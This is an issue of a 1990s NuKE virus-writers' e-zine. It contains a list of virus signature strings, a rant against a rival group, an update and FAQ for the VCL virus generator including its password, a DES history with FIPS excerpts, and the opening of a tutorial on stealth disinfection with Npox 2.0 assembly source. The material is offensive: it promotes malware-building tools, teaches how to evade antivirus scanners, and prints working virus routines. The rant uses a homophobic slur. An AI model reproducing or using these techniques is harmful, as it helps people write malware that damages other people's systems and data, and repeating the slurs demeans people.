[Destr]    Destruct        e87dfc1e0e8e5e13c4                              
[U830]     USSR 830        5b83eb0383eb312e895f                            
[BeBe]     BeBe            0e8cc82e01060c01ea                              
[MGTU]     MGTU            e8b44e8d16030103d5cd21                          
[Data]     DataLock        ed2801be280101ee2e813c4d5a                      
[Lehigh]   Lehigh          5e83ee038bde81eb9101                            
[Dm2]      Doom II         3e0a014574052e033e0301                          
[Wisc]     Wisconsin       8b0e0601be08018a0434                            
[170X]     Cascade         31343124464c                                    
[Lisbon]   Lisbon          b41acd2106568e062c00bf00005e                    
[Vienna]   Violator        b42ac6069b050190e8d6ff81                        
[BMon]     Black Mon       25cd21a10a008ec0bb80                            
[Ont]      Ontario 2       562e8a84e801b9e801f6                            
[1024]     1024            2bc875ed8bd1b80042cd21                          
[RKO]      Rocko           8bc440b104d3e8408c                              
[Hal]      Hallo           8cd08bd4bc0200368b0e                            
[Paris]    Paris           21b43fb918008d1688028d3686028b1c                
[Syslock]  Syslock         3306140031044646e2f2                            
[Fish]     Fish            0e01cfe800005b81eba9                            
[Nom]      Nomen           51b9ffff9c0ee82e00599c                          
[2133]     Scott's         8bde909081c63200b912082e                        
[Oro]      Oropax          3e011df277d1ba00                                
[JoJo]     JoJo            4d2bd04a4503e8458ec5                            
[Dance]    Devil's         5e1e068cc0488ec026                              
[Tricks]   12 Tricks       640231944201d1c24e79f7                          
[Shake]    Shake           31d28bcacd213d00f073                            
[V800]     V800            51ad33d0e2fb59311547                            
[June16]   June            4da9a52e70662e57090f                            
[Taiwan]   Taiwan          8a0e950081e1fe00ba9e                            
[J13]      July 13th       1200b9b1042e300446e2                            
[1210]     1210            c474f02e803e2f040175                            
[Vcomm]    Vcomm           b92000b44ecd21730c                              
[VP]       VP              891e22038c062403b41abac6                        
[Jeru-A]   Jerusalem       f3a526c606fe03cb58                              
[C-J]      Japan           f581c60005803ce9                                
[XA1]      Christmas Tree  fa8bec5832c089460281                            
[Sorry]    Sorry           eb96832e120040832e03                            
[Rtiny]    Tiny            8bfa0e1fcd3257b04df2ae                          
[1381]     1381            c88ed8b840008ec0fce85804803e                    
[Ita]      ItaVir          b85845894002b000884004                          
[Liberty]  Liberty         e8fdfe722a3bc17c27e8                            
[Vacs]     Vacsina         b801438e5e0e8b56062e                            
[Wolf]     Wolf            8ec0b87725d3e326ff                              
[Flash]    Flash           b000fad50a8807eb05eac0                          
[Zero]     Zero            eb2b905a45cd602e                                
[A2]       AIDS II         a4005589e581ec0202bfca050e57bf3e01              
[fume]     Perfume         0406bfba0057cb0e1f8e06                          
[Joke]     Joker           5607450721071d49276d20736f206d7563              
[C-2B]     DC II-b         2e8a0732c2d0ca2e                                
[Not]      Nothing         720450eb0790b44c                                
[Dbase]    DBASE           80fc6c74ea80fc5b74e5                            
[Alabama]  Ala             8f061805268f061a                                
[Crime]    DC              36010183ee038bc63d00                            
[DC-2]     DC-2            8a9403018dbc29018d8cea06                        
[Ice]      MIX1            43813f455875f1b80043cd21                        
[SurivA]   Suriv A         735552495600                                    
[Yap]      Yap             e800005b81eb31012ef687                          
[2480]     Crew-2480       cd21b6008bc2b11ef6f13c                          
                                                                           
                        Screaming Radish/NuKE                              
===========================================================================
===========================================================================
A "Virus Group" or "Viral Warez?"                                          
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                          
                                                                           
As a long-time figure in the virus world, I cannot help but be disgusted   
by some of the upstart new "virus groups" that have been appearing in the  
last six months. These so-called virus writers are little more that warez  
people who like to pass around viruses instead of pirated software. For    
example, there's one Toronto-based group, who shall remain nameless,       
which has it's own couriers and ANSI makers. This is sickening. This       
sweet-potato "virus group" consists of a bunch of geeks who get off on     
mass-producing lame viruses, then typing up stupid .NFO files remeniscent  
of INC and sending the package out around their local area. Too cheap      
to call long-distance, too lame to phreak, these scum are largely confined 
to Ontario, though they claim to have sites all over the world, which are, 
of course, PRI-VATE, making them conveniently hard to reach. A good thing, 
too, since these sites don't exist.                                        
                                                                           
Then these faggots create their "own" virus-generator using code ripped    
straight from PS-MPC and V.C.L. v1.0 (NOPed to defeat basic scanners), then
don't give credit where credit is due... This lame virus generator comes   
with a nice snazzy .NFO file with huge, dripping ASCII drawings of their   
group's name, nice boxes, credits, etc., straight out of an INC/TDT info   
file. Not only that, but this group can't even decide it's own name, which 
changes from virus to virus, from newsletter to newsletter. (Youth,        
youngsters, which is it?  Why not just change it to "14-year-olds?")       
The membership is also constantly changing. Most members don't do shit,    
while a few write tons of lame trojans and viruses so that they have       
something to brag about.                                                   
                                                                           
VGA artists? ANSI artists? What the fuck is this? Since when did a         
virus require a graphic? It seems as though the group can't decide whether 
it'll put out art or viruses...                                            
                                                                           
And what sort of virus group has couriers? Are their viruses so awful      
that they won't spread by themselves? Why do some members have personal    
LD couriers to call across town? (Too cheap to pay for local calls? When   
the split to 905 occurs they'll probably have to retire!) Why do they have 
couriers, period? Next thing you know they'll have full-time doc writers.  
Wait, they already do! I guess the people who run this group are too dead  
to think of their own shit so they have to hire others.                    
                                                                           
If we're all lucky, these people MAY go away soon, VIPER themselves        
into retirement. Of course there are always plenty of groups to rise up    
and take their place. There are groups that form and then break apart      
because no one knows how to program. There are those one-man groups of     
people who are too repulsive to get anyone to help them... I guess these   
groups serve one important function -- they make the real virus programmers
look that much better.  Thanks guys.                                       
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
VCL v2.0 Update                                                            
~~~~~~~~~~~~~~~                                                            
                                                                           
"What's happening with VCL v2.0?" is all we ever hear today. Well, making  
a product like VCL is not as easy as you may think! Let's compare.         
VCL offers the user unique user-configured viruses; if you want it to      
display a message, no problem; if you wish to add a routine, no problem.   
It's very flexible, unlike other virus generators. The others simply       
consist of one generic virus, a simply blocks out unneeded parts to        
generate your virus. The options it gives you are junk, like "Infect .COM" 
or "Infect .EXE."  Please, we don't need that, you could just hack out a   
pre-existing virus if you want that.  VCL is much more complex.            
                                                                           
Nevertheless, we did it once with VCL v1.0, and we will continue to set the
standard with v2.0. The VCL kit is STILL undergoing construction. It will  
feature a similar user-friendly environment, but the viruses produced will 
be much better than before. The key word is STEALTH, v2.0 seeing the       
addition of TSR viruses with numerous stealth options, some never seen or  
tried before on a virus. Some of the new features of VCL v2.0 include:     
                                                                           
        o .COM, .EXE, .OVL, .SYS, and .BIN infection                       
        o Floppy boot sector infection for 360k, 1.2M, 720k, 1.44M, and    
          2.88M diskettes                                                  
        o MBR/partition infections for hard disks                          
        o Directory-entry infections (similar to Creeping Death)           
        o Incredible stealth capabilities                                  
        o Cryptex(C) encryption generation, with support for MtE and TPE   
        o The NuKE Encryption Device, a mutation engine by Nowhere Man     
          written for use with v2.0                                        
        o Anti-anti-virus options                                          
        o Improved anti-trace options                                      
        o Increased user control over virus creation (more options!)       
        o New effects and conditions                                       
        o Enhanced environment                                             
                                                                           
v2.0 will also differ from the initial release in that it is a team effort.
While v1.0 was entirely written by Nowhere Man, v2.0 is a complete NuKE    
collaboration; besides Nowhere Man, Rock Steady, Screaming Radish, TäLöN,  
and others will be working on the project. This allows us to expand VCL in 
ways that one man alone could not hope to do, a perfect example of the     
increasing cohesiveness of our group.                                      
                                                                           
So, when will v2.0 be completed? We can't say for certain. Already several 
deadlines have been broken, and we'd rather not promise any dates. All we  
can say with certainty is that it will be released before the end of the   
year. Keep a look out for it, and keep those suggestions coming!           
                                                                           
                                                                           
VCL v1.0 FAQ                                                               
~~~~~~~~~~~~                                                               
                                                                           
Nowhere Man has provided us with a list of frequently asked questions (and 
their answers) concerning VCL v1.0, which we present here. He requests that
no more bug reports be made, as v2.0 is being rewritten from the ground up 
and so should therefore be free of bugs in v1.0. Comments and suggestions  
are still welcome, however.                                                
                                                                           
                                                                           
Q: HeY d00d cAn U TeLL mE ThE PW FOR YouR VCL pRoGRAM?                     
                                                                           
A: VCL v1.0 was password-protected for this very reason: to keep lame fucks
   like this from using it. I gave out the password on every NuKE site, and
   relied upon word-of-mouth to spread it from there. All "good" boards    
   would probably get it. However, seeing as v1.0 is now becoming outdated,
   I've decided to be generous and tell the password to the world: it's    
   "Chiba City" (typed exactly as shown, capital Cs, lower-case otherwise).
   Please do not mail me (or anyone else) for the password, 'cause I'll    
   just delete the message. (For those who are interested, "Chiba City" was
   a random phrase taken from William Gibson's _Neuromancer_. There was    
   some conjecture on the nets a while ago as to what it meant. It's a city
   in Japan where much of the book's action takes place.)                  
                                                                           
                                                                           
Q: Why do you include an IDE (Integrated Development Environment)? I mean, 
   using an IDE is akin to a walking person intentionally crippling his own
   legs or a sighted person poking her own eyes out, right?                
                                                                           
A: Fuck off, Dark Angel. :-)                                               
                                                                           
                                                                           
Q: How come VCL doesn't install properly? I type in the password (Chiba    
   City), but it says I need to reinstall from an original copy, or it     
   hangs when creating VCL.CFG. I'm running with (whatever)...             
                                                                           
A: Ok, there can be several causes for this. First, VCL v1.0 will not work 
   with Stacker, SuperStor, or any other on-the-fly disk compressor. Sorry,
   but I was unaware of this problem for quite a while, since no one I know
   uses Stacker. Run it from an unStacked disk. The other problem could be 
   caused by a bad version of INSTALL.EXE, the installation program. I have
   released a new version of it under the name NEWINSTL.ZIP (some copies of
   VCL will have the new install included). If you don't already have it   
   and you can't install properly, try using the new version. If all else  
   fails, only install to C:\VCL, that should always work. Otherwise, your 
   problem is a corrupted .ZIP or a hacked/pre-installed copy of VCL. Use  
   only the original version.                                              
                                                                           
                                                                           
Q: Where's your source code, dude? I want to hack it so I can make my      
   "own" virus generator, but I can't seem to find it. Is it inside the    
   .EXE or something? Please help me soon, a new version of IVP is due     
   out next week! Also, why don't you include some ANSIs with VCL and      
   put in a .NFO file with elaborate ASCII setups, NoWhere Man?            
                                                                           
A: (Nowhere Man draws a gun, raises it to the head of the blithering,      
    fourteen-year-old Torontonian fashion-tragedy standing before him,     
    and pulls the trigger. KABLYAM!)                                       
                                                                           
    Seriously, the source code to VCL will not released to the general     
    public, it's for NuKE internal use only. Sorry. Nowhere Man will be    
    happy to answer any general questions as to the workings of the VCL    
    IDE/compiler, if you're wondering how it works.                        
                                                                           
                                                                           
Q: VCL won't compile my virus.  How come?                                  
                                                                           
A: There are several causes for this, too. First, you may not have your    
   assembler configured correctly (check it out from DOS, and be sure that 
   the Assembler string is set correctly), or you may not have an assembler
   at all. If your assembler normally works, it could be that you don't    
   have enough memory for the compiler (VCL shells out to run it, and it   
   itself uses 200k, so if you have low memory when starting VCL, your     
   assembler will have even less). Try removing TSRs, decreasing buffers,  
   etc. if this seems to be the case. Your assembler might not be truely   
   MASM/TASM compatible, too. Specifically, A86 will not work with VCL     
   without user-modification of VCL-generated code. There is also the      
   chance that a routine that you've added has bad assembler code, causing 
   your assembler to abort, spoiling the process. There's also the very    
   remote chance that VCL has produced bad code (when there is low memory  
   a stray pointer sometimes causes VCL to go haywire and churn out bad    
   ASM code). If none of this seems to be the case, just Make .ASM and     
   assemble it yourself from DOS.                                          
                                                                           
                                                                           
Q: HELLO CAN I HELP WITH YOUR VIRUS MAKER? I NO BASIC GOOD AND I WILL      
   MAKE U AN ANSI 2 IF U GET ME SUM CC#S AND CODEZ AND DRIVE TO            
   INDIANA TO GET ME FIREWORKS!                                            
                                                                           
A: Go to hell, Suicidal Maniac!                                            
                                                                           
                                                                           
Q: I've written a virus and it seems to crash occationally or give odd     
   error messages. What's up?                                              
                                                                           
A: Do you have Anti-Tracing functions on? If so, turn them off. I made     
   a small mistake in the anti-trace code which can cause system crashes   
   under some conditions. It worked fine for me, but on some setups strange
   things can happen. If you don't have anti-tracing on, I'm afraid I can't
   help you...just look over the code (if you no assembler) and look for   
   possible errors.                                                        
                                                                           
                                                                           
Q: Ok, I've written a trojan horse, but when I run it, it crashes. I've    
   compiled from DOS with...                                               
                                                                           
A: Ah ha, that's enough! As I stated in the on-line help, when using       
   encryption on a trojan horse, you *must* compile from the VCL IDE. If   
   for some reason you are compiling from DOS, TURN ENCRYPTION OFF. You    
   see, unlike viruses, which can start off unencrypted, trojans must be   
   encrypted from the start, since they only go off once and are sent      
   direct, not in infected files. For that reason, the general technique of
   having the initial encryption key be zero (used by almost all encrypted 
   viruses) won't work; VCL generates the encryption routine assuming the  
   trojan's already encrypted. When you compile from the IDE, VCL pre-     
   encrypts the trojan, so the encryption/decryption routine decrypts it at
   runtime. But when you compile from DOS, the trojan is unencrypted, so   
   when it's run, the routine *encrypts* the virus, causing it to crash    
   (the processor's trying to run useless code).                           
                                                                           
                                                                           
Q: HEY D00D I WANT TO HELP U WITH YOUR VIRUS CREATOR LAB NOW! WHAT DO      
   I DO FOR IT NE WAY? THANX L8R!!!                                        
                                                                           
A: Damn it, Suicidal Maniac, didn't you hear me the first time? FUCK OFF!  
                                                                           
                                                                           
Q: When I link my virus, it says "Warning: no stack." What's wrong?        
                                                                           
A: Absolutely nothing. The linker can give this message if it's generating 
   a .COM file (which all VCL executables are). It thinks there should be  
   a stack, but .COMs don't have built-in stacks, only .EXEs do. Be sure   
   to run EXE2BIN, however, as the linker output an .EXE file.             
                                                                           
                        Nowhere Man and The NuKE Associates                
===========================================================================
===========================================================================
Data Encryption Standard (DES)                                             
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                             
                                                                           
The DES algorithm is a mathematical device, not an IC chip, computer system
or other piece of hardware. Several of H/Pers have heard of the buzzword   
"DES Encryption" many times and, yet, few individuals seem to know what it 
really means. Therefore, on my search to find out more about the IBM 9600  
modems included with the IBM 4700s, I fell upon the need-to-know on how DES
really worked, in order to learn about its fallbacks, hopefully this will  
answer many questions you have, as well as generate a few.                 
                                                                           
The Computer Age brought with it computer usage in banking and the         
financial institutions. Inevitably, computer crime came along with it.     
There arose the problem that, with sufficient knowledge and a computer     
terminal, one could transfer funds into his own account, make credit       
purchases on someone else's card, or even get money from a cash-dispensing 
machine.                                                                   
                                                                           
IBM quickly realized this and in the early 1970 set up a research group to 
develop a suitable cipher code to protect data. In 1971, a code named      
LUCIFER was developed. It was sold to Lloyds of London for use with an     
IBM-developed cash-dispensing system.                                      
                                                                           
                                                                           
LUCIFER                                                                    
~~~~~~~                                                                    
Lucifer was successful but it had some weaknessess. IBM then spent about   
three years refining and strengthening Lucifer. The code was analyzed over 
and over by experts in cryptology. It withstood sophisticated              
cryptoanalytical attacks and, by 1974, it was ready to market. Around the  
same time, the National Bureau of Standards (NBS) which since 1965 was     
responsible for developing standards for the purchase of computer equipment
by the Federal Government (USA) initiated a study of computer security. The
NBS saw a need for an encryption method, and solicited for a suitable      
encryption algorithm. This was done in May 1973, and August 1974. The      
algorithm was to be for the storage and transmission of unclassified data. 
In response to this solicitation IBM submitted its Lucifer cipher. This    
cipher consisted of an extremely complex algorithm embedded in an IC       
structure. Basically the cipher key goes into a series of eight "S" boxes  
-- complex mathematical formulas that encrypt and decrypt data with the    
appropriate key. The initial Lucifer cipher had a 128-bit key. Before it   
submitted the cipher to NBS, IBM shortened it by removing more than half   
the key.                                                                   
                                                                           
                                                                           
NSA Participation                                                          
~~~~~~~~~~~~~~~~~                                                          
The National Security Agency (NSA), however, had taken an enormous interest
in Project Lucifer. It had lent IBM a hand in the development process and  
had helped to develop the S-box structures, as NSA needed to know the      
structure of Lucifer just in case they needed to decrypt data encoded with 
it. For years NSA had been dependent on international data communications. 
It monitored data communications, such as Middle East oil transactions and 
messages, and the financial and trade transactions from Latin American,    
Europe, and the Far East. Also, military and diplomatic intelligence       
(encrypted using crude techniques) were picked up and deciphered by NSA.   
Thus, much information about Communist countries was obtained from non-    
communist countries. Now, the development of an economical, highly secure, 
data-encryption device threatened to cause NSA serious trouble. Also,      
outside researchers might stumble across some of NSA's methods.            
                                                                           
Meetings of NSA and IBM resulted in an agreement by IBM to reduce its key  
from 128 bits to 56 bits, and to classify certain details about their      
selection of the eight "S" boxes for the cipher. The National Bureau of    
Standards passed this cipher to NSA for analysis. The NSA certified the    
algorithm as "free" of any mathematical or statistical weaknesses and      
recommended it as the best candidate for the National Data Encryption      
Standard (DES). This suggestion was met with criticism. Was the cipher just
long enough to prevent corporate eavesdroppers from penetrating it, and    
just short enough for NSA's code breakers?! Was there a mathematical trick 
(CLASSIFIED) that would enable NSA to quickly break the code?              
                                                                           
The NSA had been tinkering with the critical "S" boxes, and it had         
therefore INSISTED that certain details were to be classified. The reason  
sited for this was simple: since the DES would be commercially available   
and would be sold abroad as well, NSA would be hanging itself by permitting
the foreign use of an unbreakable cipher. The weaknesses designed into the 
cipher would still allow the agency to penetrate every communications      
channel and data bank using DES. The code breakers at NSA wanted to be sure
the NSA could break the cipher. As a result, a bureaucratic agreement was  
reached. The S-Box part of the cipher was strengthened (which is           
CLASSIFIED), and the key, which was dependent on the users of the code was 
weakened.                                                                  
                                                                           
(Did NSA put a "Backdoor" into DES? The answer is normally YES! NSA had to 
have the upper-hand to all code encrypted with DES. If we go back a few    
months a movie was based on this topic. "Sneakers" raised several hints    
that DES had a backdoor.)                                                  
                                                                           
Computer "rumours" (well more like FACTS) say that it would be possible to 
build a computer using a million special "search chips" that could test a  
million possible solutions per second, and, therefore in 72,000 seconds    
(20 hours), all possible combinations could be tried. There would be a 50% 
probability that just 10 hours of trial-time would break the code          
(56-bits).                                                                 
                                                                           
What if the 128-bit key, the original Lucifer, had been submitted for      
consideration? Or did IBM submit the 128-bit key Lucifer but "reasoned"    
with the NSA for a 56-bit key? Nevertheless a 128-bit key provides         
34.03 x 10 ^ 37, or 34 followed by 37 zeros, combinations! This number     
is astronomical and incomprehensible to most people. If one TRILLION       
solutions per second were possible it would take a mere 34 x 10 ^ 25       
seconds or about 10,800,000,000,000,000,000 YEARS! And we are only rumoured
to know about the one-million possible solutions per second, not a trillion
as used on this example! Therefore IBMs Lucifer code (at present) is       
probably unbreakable.                                                      
                                                                           
                                                                           
DES Becomes Accepted                                                       
~~~~~~~~~~~~~~~~~~~~                                                       
And on June 15, 1977, the Data Encryption Standard (DES) became the        
official civilian cipher of the U.S. government. It is now widely used in  
banking systems and other classified institutions.                         
                                                                           
To follow are a few clips from FIPS on DES, perhaps we can learn a tab from
this code and implement a rather crude manner of it into a virus? Undoubtly
we will have all of Soloman's, McAfee's, Frisk's and other's horses and men
trying to "crack" the code, but will they succeed in doing so? There's only
one way to find out now? Right?                                            
                                                                           
                                                                           
Excerpts from the Data Encryption Standard                                 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                 
(From Federal Information Processing Standards (FIPS) publications 46, 74, 
and 81.)                                                                   
                                                                           
The Data Encryption Standard (DES) specifies an algorithm to be            
implemented in electronic hardware devices and used for the cryptographic  
protection of computer data. The publications concerning this standard     
provide a complete description of mathematical algorithm for encrypting    
(enciphering) and decrypting (deciphering) binary-coded information.       
Encrypting data converts the data to an unintelligible form called cipher. 
Decrypting a cipher converts the data back to its original form. The       
algorithm described in the standard specifies both enciphering and         
deciphering operations which are based on a binary number called a key. The
key consists of 64-binary digits, of which 56 bits are used directly by the
algorithm and 8 bytes are used for error detection (checksum).             
                                                                           
Binary-coded data may be cryptographically protected using the DES         
algorithm in conjunction with a key. The key is generated in such a way    
that each of the 56-bits used directly by the algorithm are random and the 
8 error-detecting bits are set to make the parity of each 8-bit byte of the
key odd, ie: there is an odd number of 1s in each 8-bit byte. Each member  
of a group of authorized users of encrypted computer data must have the key
that was used to encipher the data in order to use the data. This key, held
by each member in common, is used to decipher any data received in cipher  
form from other members of the group. The encryption algorithm specified in
this standard is commonly known among those using the standard. The unique 
key chosen for use in a particular application makes the results of        
encrypting data, using the algorithm, unique. Selection of a different key 
causes the cipher, which is produced for any given set of inputs, to be    
different. The cryptographic security of the data depends on the security  
provided for the key that is used to encipher and decipher the data.       
                                                                           
Data can be recovered from a cipher only by using the exactly same key that
was used to encipher it. Unauthorized recipients of the cipher, who know   
algorithm but do not have the correct key, cannot derive the original data 
algorithmically. However, anyone who does have the key and the algorithm   
can easily decipher the cipher and obtain the original data. A standard    
algorithm, which is based on a secure key, thus provides a basis for       
exchanging encrypted computer data, by issuing the key that is used to     
encipher it only to those authorized to have the data. Additional Federal  
Information Processing Standards (FIPS) guidelines for implementing and    
using the DES are being developed and will be published by NBS.            
                                                                           
"Guidelines for Implementing and Using the NBS Data Encryption  Standard," 
 FIPS Publication 74.                                                      
                                                                           
NBS describes two different modes for sing the algorithm described in this 
standard. Blocks of data containing 64 bits may be directly entered into   
the  device where 64-bit cipher blocks are generated under control of the  
key . This is called the "Electronic CodeBook" (ECB) mode. Alternating, the
device may be used as a binary stream generator to produce statistically   
random binary bits, which are then combined with the clear (unencrypted)   
data (1 to 64 bits) using an "Exclusive OR" (XOR) logic operation. In order
to assure that the enciphering device and the deciphering device are       
synchronized their inputs are always set to the previous 64 bits of cipher 
that were transmitted or received. This second mode of using the encryption
algorithm is called the "Cipher FeedBack" (CFB) mode.                      
                                                                           
The Electronic CodeBook mode generates blocks of 64 cipher bits.The Cipher 
Feedback mode generates a cipher having the same number of bits as the     
plain text. Each block of cipher is independent of all others when the     
Electronic CodeBook mode is used, while each byte (group of bits) of cipher
depends on the previous 64 cipher bits when the Cipher FeedBack mode is    
used.                                                                      
                                                                           
The cryptographic algorithm specified in this standard transforms a 64-bit 
binary value into a unique 64-bit binary value based on a 56-bit variable. 
If the complete 64-bit input is used (ie: none of the input  bits should be
predetermined from block to block) and if the 56-bit variable is randomly  
chosen, no technique other than that of trying all the possible keys, using
a know input and output for the DES, will guarantee finding the chosen key.
As there are over 70,000,000,000,000,000 (70 quadrillion) possible keys of 
56 bits, the feasibility of deriving a particular key in this way is       
extremely unlikely in typical "threat" environments. Moreover, if the key  
is changed frequently, the risk of this event happening is greatly         
diminished. However, users should be aware that it is theoretically        
possible to drive the key in fewer trials (with a correspondingly lower    
probability of success depending on the number of keys tried), and should  
be cautioned to changed the key as often as practical. Users must change   
the key and must provide it a high level of protection in order to         
minimize the potential risks of its unauthorized computation or            
acquisition. The feasibility of computing the correct key may change with  
advances in technology.                                                    
                                                                           
                                                                           
Data Encryption Methods                                                    
~~~~~~~~~~~~~~~~~~~~~~~                                                    
Encryption is the transformation of data from its original intelligible    
form to an unintelligible cipher form. Two basic transformations may be    
used: permutation and substitution. Permutations changes the order of the  
individual symbols comprising the data. In a substitution transformation,  
the symbols themselves are replaced by others symbols. During permutation, 
the symbols retain their identities but lose their positions. During       
substitution, the symbols retain their positions but lose their original   
identities.                                                                
                                                                           
The set of rules for a particular transformation is expressed in an        
algorithm. Basic transformations may be combined to form a complex         
transformation. In a computer system, the symbols of the data are groups of
one or more binary digits (1s and 0s) called bits. A group of bits is      
called a byte. In computer applications, the encryption transformation of  
permutation reorders the bits of the data. The encryption transformation of
substitution replaces one bit with another or one byte with another.       
                                                                           
                                                                           
Data Encryption Algorithm                                                  
~~~~~~~~~~~~~~~~~~~~~~~~~                                                  
The algorithm is designed to encipher and decipher blocks of data          
consisting of 64-bits under control of a 64-bit key. Deciphering must be   
accomplished by using the same key that was used for enciphering, but with 
the schedule of addressing the key bits altered so that the deciphering    
process is the reverse of the enciphering process.                         
                                                                           
A block to be enciphered is subjected to an initial permutation, IP,and    
then to a compels key-dependent computation, and, finally, to a permutation
which is the inverse of the initial permutation. The key-dependant         
computation can be defined simply, in terms of a functions "F" called the  
cipher function, and the function `KS' called the key schedule. A          
description of the computation is given first along with the details as to 
how the algorithm is used for encipherment. Next the use of the algorithm  
for decipherment is described. Finally, a definition of the cipher         
functions "F" is given in terms of the primitive functions, and which are  
called selection functions "Si" and the permutations function "P". The     
primitive functions Si, P, KS of the algorithm are contained in the        
Appendix of FIPS Publication 46.                                           
                                                                           
The following notation is convenient: Given two blocks (L and R) of bits,  
LR denotes the block consisting of the bits of L followed by the bits of R.
Since concatenation is associative B1,B2...B8, for the example, denotes the
block consisting of the bits of B1 followed by the bits of B2...followed by
the bits of B8.                                                            
                                                                           
                                                                           
Enciphering                                                                
~~~~~~~~~~~                                                                
A sketch of the enciphering computation is given below. The following      
information is given more clearly and accurately in FIPS Publications 46   
and 74. It is quoted here for informational purposes only.                 
                                                                           
The 64 bits of the input block to be enciphered are first subjected to the 
following permutations call the initial permutations, IP:                  
                                                                           
--------- IP -----------   That is, the permuted input has bit             
58 50 42 34 26 18 10  2    58 of the input as its first bit, bit           
60 52 44 36 28 20 12  4    50 as its second bit, and so on, with           
62 54 46 38 30 22 14  6    bit 7 as its last bit. The permuted             
64 56 48 40 32 24 16  8    input to the complex key-dependent              
57 49 41 33 25 17  9  1    computation described below. The                
59 51 43 35 27 19 11  3    output of that computation, called the          
61 53 45 37 29 21 13  5    preoutput, is then subjected to the             
63 55 47 39 31 23 15  7    following permutation, IP-1, which is           
------------------------   the inverse of the initial permutation          
                                                                           
-------- IP -1 ---------                                                   
40  8 48 16 56 24 64 32    That is, the output of the algorithm            
39  7 47 14 54 22 62 31    has bit 40 of the preoutput block as            
38  6 46 14 54 22 62 30    its first bit, bit 8 as its second bit          
37  5 45 13 53 21 61 29    and so on, until bit 25 of the                  
36  4 44 12 52 20 60 28    preoutput block is the last bit of the          
35  3 43 11 51 19 59 27    output.                                         
34  2 42 10 50 18 58 26                                                    
33  1 41  9 49 17 57 25                                                    
------------------------                                                   
                                                                           
                                                                           
Characteristics of the DES Algorithm                                       
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                       
The DES algorithm is a recirculating, 64-bit, block product cipher whose   
security is based on a secret key. DES keys are 64- bit binary vectors     
consisting of 56 independent information bits and 8 parity bits. The parity
 bits are reserved for error-detection purposes and are not used by the    
encryption algorithm. The 56 information bits are used by the enciphering  
and deciphering operations and are referred to as the active key. Active   
keys are generated (selected at random from all possible keys) by each     
group of authorized users of a particular computer system or set of data.  
Each user should understand that the key must be protected and that any    
compromise of the key will compromise all data and resources protected by  
that key. In the encryption computation, the 64-bit data input is divided  
into two halves, with each consisting of 32 bits. One half is used as input
to a compels nonlinear function, and the result is Exclusive-OR'ed to the  
other half. After one iteration, or round, the two halves of the data are  
swapped and the operation is performed again. The DES algorithm uses 16    
rounds to produce a recirculating block product cipher. The cipher produced
by the algorithm displays no correlation to the input. Every bit of the    
output depends on every bit of the input and on every bit of the active    
key. The security provided by the DES algorithm is based on the fact that, 
if the key is unknown, an unauthorized recipient of encrypted data, knowing
some of the matching input data, must perform an unacceptable effort to    
decipher other encrypted data or recover the key. Even having all but one  
bit of the key correct does not result in intelligible data.               
                                                                           
The only known way of obtaining the key with certainty is by obtaining     
matching ciphertext and plaintext and, then, exhaustively testing the keys 
by enciphering the known plaintext with each key and comparing the result  
with the known ciphertext. Since 56 independent bits are used in a DES key,
2^56 such tests  are required to guarantee finding a particular key. The   
expected number of tests needed to recover the correct key is 2^55. At one 
microsecond per test, 1142 years would be required. Under certain          
conditions (not only knowing matched plaintext and ciphertext but also the 
complement of the plaintext and the resulting ciphertext), the expected    
effort could be reduced to 571 years. The possibility of 70 quadrillion    
keys makes the guessing or computing of any particular key very unlikely,  
given that the guidelines for generating and protecting a key provided in  
the publication are followed. Of course, on can always reduce the time     
required to exhaust any crytoalgorithm by having several devices working in
parallel; time is reduced but initial expenses are increased.              
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
                    *************************************                  
                    **  Disinfecting an Infected File  **                  
                    **                                 **                  
                    **       By Rock Steady/NuKE       **                  
                    *************************************                  
                                                                           
The BEST advantage a virus can have is `Disinfecting of Fly' as we must    
try to basically hide the virus as well as possible! And nowadays Anti-    
Virus programs are going crazy. As I remember at the time Npox 2.0 was     
developed it would Disinfect every file opened by F-prot and Scan and      
when the Scanner found nothing and closed the file to go on to the next    
Npox would re-infect them. Truly can cause havoc, As a matter of fact      
Frisk didn't like this as I had some `Anti Fuck-Prot' routines and he      
added his own routine to open files by Int21h/6C00h, as Npox only          
disinfected on Int21h/3Dh, however to make the virus disinfect on          
Int21h/6C00h, doesn't require much work, simply to take the ASCIIZ         
string at DS:SI and put SI into DX so we have DS:DX pointing to it,        
then run this routine.                                                     
                                                                           
The Basic idea on disinfection is this...                                  
  -For .COM files                                                          
     Restore the first 3 bytes original Bytes of the program, these        
     3 bytes are usually somewhere inside the virus, and then simply       
     remove the virus from the end of the .COM file!                       
     We do this by jumping to the end of the COM file and subtracting      
     the Virus size from the File size and that new value is the           
     original file size!                                                   
     NOTE: if you write a virus that its length changes (Polymorphic)      
     its wise to save the original Filesize to be infected before          
     hand.                                                                 
                                                                           
  -For .EXE files & Overlays                                               
     This procedure is not different, just that if you changed CS:IP &     
     SP:SS in the EXE header, simply restore the original values, or to    
     save time, simple save the Original EXE header (first 1b bytes) in    
     the virus and right that to the beginning as I did for Npox 2.0       
     Then Subtract yourself from the original size and cut it off!         
                                                                           
I will now follow thru the Npox 2.0 virus routine Closely so you can under 
stand this process.                                                        
                                                                           
Okay first thing you would want to do is CHECK if this is a valid file!    
If the virus infects COMs & EXEs, do not waste your time looking thru      
other extensions, or for tight code you can waste your time and "HOPE"     
the `infection' marker will fail! Meaning if the virus uses the seconds    
field set to 60 (as Npox) then naturally only INFECTED files will have     
a time stamp of 60! And this routine is not needed...                      
                                                                           
opening_file:   call    check_extension         ;Check for .COM extension  
                jnc     open_fuck2              ;YES; Jmp & Disinfect      
                call    check_exten_exe         ;Check for .EXE extension  
                jnc     open_fuck2              ;YES; Jmp & disinfect      
                jmp     dword ptr cs:[int21]    ;Other wise goto DOS       
                                                                           
; At this point the file has an .COM or .EXE extension, so we continue     
                                                                           
open_fuck2:     push    ax                      ;Save AX                   
                mov     ax,3d02h                ;Ready to open             
                call    calldos21               ;Do it!                    
;NOTE: its important you called Int21h YOURSELF! you CAN NOT do a "Int 21h"
;command, as the virus will intercept it, and will come to this routine    
;and it will continue over and over again, Never ending loop, until the    
;stack gets too big, overwrite the code and the system jams...All done     
;in about 2 seconds...                                                     
